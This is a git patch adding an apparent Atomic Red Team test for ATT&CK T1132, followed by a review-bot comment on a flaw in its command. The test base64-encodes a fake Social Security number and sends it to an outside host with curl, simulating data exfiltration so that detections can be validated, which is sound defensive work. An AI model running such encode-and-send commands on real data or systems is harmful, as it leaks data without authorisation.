From fda57a086be0d1cfb8b5cfd652f12399e72e5df7 Mon Sep 17 00:00:00 2001
From: Swelc
Date: Mon, 2 Jul 2018 21:39:25 -0500
Subject: [PATCH] T1132 Base64 Encoded Data
---
atomics/T1132/T1132.yaml | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
create mode 100644 atomics/T1132/T1132.yaml
diff --git a/atomics/T1132/T1132.yaml b/atomics/T1132/T1132.yaml
new file mode 100644
index 00000000..246f67a8
--- /dev/null
+++ b/atomics/T1132/T1132.yaml
@@ -0,0 +1,28 @@
+---
+attack_technique: T1132
+display_name: Data Encoding
+
+atomic_tests:
+- name: Base64 Encoded data.
+ description: |
+ Utilizing a common technique for posting base64 encoded data.
+
+ supported_platforms:
+ - macos
+ - linux
+
+ input_arguments:
+ destination_url:
+ description: Destination URL to post encoded data.
+ type: string
+ default: redcanary.com
+ base64_data:
+ description: Encoded data to post using fake Social Security number 111-11-1111.
+ type: string
+ default: MTExLTExLTExMTE=
+
+ executor:
+ name: sh
+ command: |
+ echo -n 111-11-1111 | base64
+ curl -XPOST #{base64_data}.#{destination_url}
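Review bot: In the executor's `command` block the encoded value never reaches a request body: `curl -XPOST #{base64_data}.#{destination_url}` joins it to the destination as a hostname label, and the output of the preceding `echo -n 111-11-1111 | base64` line is discarded. With the default `MTExLTExLTExMTE=` the `=` padding is not a valid hostname character, so the request likely fails before any POST is sent and the test would leave no HTTP telemetry for a detection to be validated against. If a POST body is what the description intends, `curl -XPOST -d "#{base64_data}" "#{destination_url}"` does that, and quoting both arguments also keeps shell metacharacters in user-supplied values from being interpreted by `sh`.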